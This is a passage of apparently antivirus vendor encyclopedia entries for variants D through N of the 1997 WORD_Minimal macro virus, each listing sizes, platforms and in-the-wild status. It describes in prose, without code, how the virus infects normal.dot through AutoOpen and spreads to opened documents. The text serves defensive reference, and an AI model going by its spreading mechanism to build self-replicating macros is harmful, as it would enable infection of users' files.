Variants: Minimal.A,B,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.D] Virus Name: WORD_Minimal.D Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7, Word 8 Number of Macros: 1 Encrypted: No Size of Macro: 90 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: Yes Description: The main difference between this new variant and previous Minimal viruses is that Minimal.D contains minor code changes. Minimal.D infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Minimal.D is also able to upconvert to the Word97 format and infect Word 8.0 documents. Variants: Minimal.A,B,C,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.E] Virus Name: WORD_Minimal.E Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: Yes Size of Macro: 132 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: No Description: The main difference between this new variant and previous Minimal viruses is that Minimal.E is encrypted (read-only). Minimal.E infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Variants: Minimal.A,B,C,D,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.F] Virus Name: WORD_Minimal.F Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: No Size of Macro: n/a Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: No Description: The main difference between this new variant and previous Minimal viruses is that Minimal.F contains minor code changes. Minimal.F infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Variants: Minimal.A,B,C,D,E,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.G] Virus Name: WORD_Minimal.G Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: No Size of Macro: 206 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: No Description: The main difference between this new variant and previous Minimal viruses is that Minimal.G contains minor code changes. Minimal.G infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Variants: Minimal.A,B,C,D,E,F,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.H] Virus Name: WORD_Minimal.H Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: No Size of Macro: 217 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: No Description: The main difference between this new variant and previous Minimal viruses is that Minimal.H contains minor code changes. Minimal.H infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Variants: Minimal.A,B,C,D,E,F,G,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.I] Virus Name: WORD_Minimal.I Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: No Size of Macro: 242 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: No Description: The main difference between this new variant and previous Minimal viruses is that Minimal.I contains minor code changes. Minimal.I infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Variants: Minimal.A,B,C,D,E,F,G,H,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.J] Virus Name: WORD_Minimal.J Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: No Size of Macro: 91 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: No Description: The main difference between this new variant and previous Minimal viruses is that Minimal.J contains minor code changes. Minimal.J infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Variants: Minimal.A,B,C,D,E,F,G,H,I,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.K] Virus Name: WORD_Minimal.K Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: No Size of Macro: 259 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: No Description: The main difference between this new variant and previous Minimal viruses is that Minimal.K contains minor code changes. Minimal.K infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Variants: Minimal.A,B,C,D,E,F,G,H,I,J,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.L] Virus Name: WORD_Minimal.L Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: No Size of Macro: 275 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: No Description: The main difference between this new variant and previous Minimal viruses is that Minimal.L contains minor code changes. Minimal.L infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Variants: Minimal.A,B,C,D,E,F,G,H,I,J,K,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.M] Virus Name: WORD_Minimal.M Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: No Size of Macro: 270 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: No Description: The main difference between this new variant and previous Minimal viruses is that Minimal.M contains minor code changes. Minimal.M infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Variants: Minimal.A,B,C,D,E,F,G,H,I,J,K,L,N,O,P,Q,R,S,T,U,V,W,X,Y,Z [WORD_Minimal.N] Virus Name: WORD_Minimal.N Alias: n/a Virus Type: Macro Virus Platform: Word 6, Word 7 Number of Macros: 1 Encrypted: No Size of Macro: 206 Bytes Size of Virus: n/a Size of Malicious Code: n/a Place of Origin: n/a Date of Origin: Spring, 1997 Symptoms: None Destructive: No Trigger Date: n/a Password: n/a Seen in the Wild: No Description: The main difference between this new variant and previous Minimal viruses is that Minimal.N contains minor code changes. Minimal.N infects the global template (normal.dot) when an infected document is opened (AutoOpen). Further documents become infected when they are also opened (AutoOpen). Unlike many other macro viruses, Minimal does not contain any harmful payload. It only infects other files. Variants: Minimal.A,B,C,D,E,F,G,H,I,J,K,L,M,